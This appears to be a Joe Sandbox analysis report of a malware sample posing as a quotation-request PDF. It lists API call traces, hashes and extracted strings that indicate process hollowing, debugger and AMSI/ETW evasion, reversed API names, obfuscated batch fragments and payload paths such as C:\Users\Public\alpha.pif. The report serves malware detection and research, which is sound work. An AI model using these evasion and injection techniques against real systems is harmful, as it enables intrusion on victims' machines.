                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02967A27
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                  • API String ID: 4072585319-445027087
                                                                  • Opcode ID: 2530d0054c752021cdc52a3c379816d348d91cd055084fb631654d89301b6589
                                                                  • Instruction ID: e1147a3faa4432fd6b524318f2ba027722e0d2ae0bcbfe79ff474f563530cf49
                                                                  • Opcode Fuzzy Hash: 2530d0054c752021cdc52a3c379816d348d91cd055084fb631654d89301b6589
                                                                  • Instruction Fuzzy Hash: 22115B74644208AFEB01EFA4DD65EEEB7EDEB88704F414864B904D7640E630AA108B64
                                                                  Function 029679B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02967A27
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                  • API String ID: 4072585319-445027087
                                                                  • Opcode ID: 1d85bfbcf813eef72b8d25383df0fd4bfe807db10a03e8d42bf8954c7bff0b54
                                                                  • Instruction ID: b32169957e2f99573eb9c4fc68d0bb2e30398d09465201eac44c0b7f78d1443d
                                                                  • Opcode Fuzzy Hash: 1d85bfbcf813eef72b8d25383df0fd4bfe807db10a03e8d42bf8954c7bff0b54
                                                                  • Instruction Fuzzy Hash: A2116D74644308AFEB01EFA4DD65FEEB7EDEB8C704F414864B904D7640E630AA108B64
                                                                  Function 02968254 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029682C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                  • String ID: ntdll$yromeMlautriVdaeRtN
                                                                  • API String ID: 2521977463-737317276
                                                                  • Opcode ID: c5ee472948aa5c62600287475ce4f8dee5d91e58250950ddd31caf4765786a93
                                                                  • Instruction ID: bfc5ca8a0919f49dd302e251b68ac9f91bb1954180f091a3012088df05a2b1a4
                                                                  • Opcode Fuzzy Hash: c5ee472948aa5c62600287475ce4f8dee5d91e58250950ddd31caf4765786a93
                                                                  • Instruction Fuzzy Hash: EC018074744204AFEB00EFA4D855EAE77EEFB8C700F414860F804D7640D630A9148F24
                                                                  Function 02967D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02967D74
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                  • String ID: Ntdll$yromeMlautriVetirW
                                                                  • API String ID: 2719805696-3542721025
                                                                  • Opcode ID: e2040e2507f4a17025422141970378afacb0087224cbee2b66dbeeef89ddb586
                                                                  • Instruction ID: fffb0edfc50bde2074c65378b462fdcf496065426a06eee8111935d7206c0760
                                                                  • Opcode Fuzzy Hash: e2040e2507f4a17025422141970378afacb0087224cbee2b66dbeeef89ddb586
                                                                  • Instruction Fuzzy Hash: D6014C74644208AFEB01EFA8EC69EFEB7EDEF88704F514850F908D7680D630A9508F64
                                                                  Function 029684C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02968090,?,?,00000000,?,02967A06,ntdll,00000000,00000000,02967A4B,?,?,00000000), ref: 0296805E
                                                                    • Part of subcall function 02968020: GetModuleHandleA.KERNELBASE(?), ref: 02968072
                                                                    • Part of subcall function 029680C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02968150,?,?,00000000,00000000,?,02968069,00000000,KernelBASE,00000000,00000000,02968090), ref: 02968115
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0296811B
                                                                    • Part of subcall function 029680C8: GetProcAddress.KERNEL32(?,?), ref: 0296812D
                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 02968529
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                  • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                  • API String ID: 3503870465-2520021413
                                                                  • Opcode ID: 6ed333b311dd9a5c74be41dc79a947fbde2b8f4dd62e2a6aa8f0e458e6bd2fc4
                                                                  • Instruction ID: 820c19219c67943e372b30ae8c164421f73910edd3d565a47ae14283cd2236a2
                                                                  • Opcode Fuzzy Hash: 6ed333b311dd9a5c74be41dc79a947fbde2b8f4dd62e2a6aa8f0e458e6bd2fc4
                                                                  • Instruction Fuzzy Hash: 01016274644304AFEB01EFA4D865EBE77EEFB89710F914860F40497640EA30A9548F24
                                                                  Function 0296D9F0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlInitUnicodeString.NTDLL(?,?), ref: 0296DA6C
                                                                  • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DABE), ref: 0296DA82
                                                                  • NtDeleteFile.NTDLL(?), ref: 0296DAA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFileInitStringUnicode
                                                                  • String ID:
                                                                  • API String ID: 3559453722-0
                                                                  • Opcode ID: 1bfc42aa5c10025be9cadd6bab54397febd1d2cf129f487b5e4dfaf52709e80b
                                                                  • Instruction ID: 367b22b360e94043532dbff850d4c6a601633f0dcaaa175d9f79ecef8ac4dbcc
                                                                  • Opcode Fuzzy Hash: 1bfc42aa5c10025be9cadd6bab54397febd1d2cf129f487b5e4dfaf52709e80b
                                                                  • Instruction Fuzzy Hash: 4B014F75B0C248AEEB05EBA08D45BED77F9AB84704F5000A29224E6081DB75AB048B75
                                                                  Function 0296DA44 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02954ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02954EDA
                                                                  • RtlInitUnicodeString.NTDLL(?,?), ref: 0296DA6C
                                                                  • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DABE), ref: 0296DA82
                                                                  • NtDeleteFile.NTDLL(?), ref: 0296DAA1
                                                                    • Part of subcall function 02954C0C: SysFreeString.OLEAUT32(0296E950), ref: 02954C1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocDeleteFileFreeInitUnicode
                                                                  • String ID:
                                                                  • API String ID: 2841551397-0
                                                                  • Opcode ID: af82f23c3887c5e076a01cc8d93edcc28ab77eb4ade78e00d152185ed446785d
                                                                  • Instruction ID: 09e37c7e89510d2e7feb63776eb07831e0b8a1dd12df329646372f0fd77047fa
                                                                  • Opcode Fuzzy Hash: af82f23c3887c5e076a01cc8d93edcc28ab77eb4ade78e00d152185ed446785d
                                                                  • Instruction Fuzzy Hash: 7C01E171B4820CAADB11EAE0CD55FDEB3FDEB88704F504461A514F2180EB756B048A74
                                                                  Function 02966D50 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02966CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02966D41,?,?,?,00000000), ref: 02966D21
                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,02966E34,00000000,00000000,02966DB3,?,00000000,02966E23), ref: 02966D9F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFromInstanceProg
                                                                  • String ID:
                                                                  • API String ID: 2151042543-0
                                                                  • Opcode ID: 6741948489ef67128e3d3155ed3cb4ed8759bd460af5d7d6f1c8b551a6c0f463
                                                                  • Instruction ID: b8975d734839662d713f122989a14a7fd685b6999f1fc900b422b40f58cef53f
                                                                  • Opcode Fuzzy Hash: 6741948489ef67128e3d3155ed3cb4ed8759bd460af5d7d6f1c8b551a6c0f463
                                                                  • Instruction Fuzzy Hash: 1601F771208704AFE706DFA4DC5687F7BEDEBC9710B524435F901D2680E6388D10C960
                                                                  Function 0296EC74 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InetIsOffline.URL(00000000,00000000,0297AFA1,?,?,?,000002F7,00000000,00000000), ref: 0296ECAE
                                                                    • Part of subcall function 02968824: LoadLibraryA.KERNEL32(00000000,00000000,0296890B), ref: 02968858
                                                                    • Part of subcall function 02968824: FreeLibrary.KERNEL32(74B30000,00000000,029B1388,Function_000065D8,00000004,029B1398,029B1388,05F5E0FF,00000040,029B139C,74B30000,00000000,00000000,00000000,00000000,0296890B), ref: 029688EB
                                                                    • Part of subcall function 0296EB94: GetModuleHandleW.KERNEL32(KernelBase,?,0296EF98,UacInitialize,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,ScanString,029B137C,0297AFD8,Initialize), ref: 0296EB9A
                                                                    • Part of subcall function 0296EB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0296EBAC
                                                                    • Part of subcall function 0296EBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 0296EC00
                                                                    • Part of subcall function 0296EBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0296EC12
                                                                    • Part of subcall function 0296EBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0296EC29
                                                                    • Part of subcall function 02957E18: GetFileAttributesA.KERNEL32(00000000,?,0296F8CC,ScanString,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanString,029B137C,0297AFD8,UacScan,029B137C,0297AFD8,UacInitialize), ref: 02957E23
                                                                    • Part of subcall function 0295C2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02AA58C8,?,0296FBFE,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,OpenSession), ref: 0295C303
                                                                    • Part of subcall function 0296DBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DC80), ref: 0296DBEB
                                                                    • Part of subcall function 0296DBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0296DC80), ref: 0296DC1B
                                                                    • Part of subcall function 0296DBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0296DC30
                                                                    • Part of subcall function 0296DBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0296DC5C
                                                                    • Part of subcall function 0296DBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0296DC65
                                                                    • Part of subcall function 02957E3C: GetFileAttributesA.KERNEL32(00000000,?,02972A49,ScanString,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,Initialize), ref: 02957E47
                                                                    • Part of subcall function 02957FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02972BE7,OpenSession,029B137C,0297AFD8,ScanString,029B137C,0297AFD8,Initialize,029B137C,0297AFD8,ScanString,029B137C,0297AFD8), ref: 02957FDD
                                                                    • Part of subcall function 0296DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DB9E), ref: 0296DB0B
                                                                    • Part of subcall function 0296DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0296DB45
                                                                    • Part of subcall function 0296DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0296DB72
                                                                    • Part of subcall function 0296DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0296DB7B
                                                                    • Part of subcall function 029687A0: LoadLibraryW.KERNEL32(bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize,029B13A4,0296A77C,UacScan), ref: 029687B4
                                                                    • Part of subcall function 029687A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029687CE
                                                                    • Part of subcall function 029687A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000868,00000000,029B13A4,0296A3C7,ScanString,029B13A4,0296A77C,ScanBuffer,029B13A4,0296A77C,Initialize), ref: 0296880A
                                                                    • Part of subcall function 0296870C: LoadLibraryW.KERNEL32(amsi), ref: 02968715
                                                                    • Part of subcall function 0296870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02968774
                                                                  • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,ScanBuffer,029B137C,0297AFD8,OpenSession,029B137C,0297AFD8,0297B330), ref: 029749B7
                                                                    • Part of subcall function 0296DA44: RtlInitUnicodeString.NTDLL(?,?), ref: 0296DA6C
                                                                    • Part of subcall function 0296DA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0296DABE), ref: 0296DA82
                                                                    • Part of subcall function 0296DA44: NtDeleteFile.NTDLL(?), ref: 0296DAA1
                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 02974BB7
                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 02974C0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                  • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                  • API String ID: 3130226682-181751239
                                                                  • Opcode ID: c7b2992acead7048061a5b0d0169ef3482993f49f1eadf7648ea0750aed11259
                                                                  • Instruction ID: a5dc9d7be7d0964a86aad147420ea63d5d3676929e16f33feb79a362ae871699
                                                                  • Opcode Fuzzy Hash: c7b2992acead7048061a5b0d0169ef3482993f49f1eadf7648ea0750aed11259
                                                                  • Instruction Fuzzy Hash: 8C24FB75B102688FDB51EF64DD90AED73F6BFC9310F2050E6E409AB254DA30AE859F90
                                                                  Function 02977878 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771processthreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
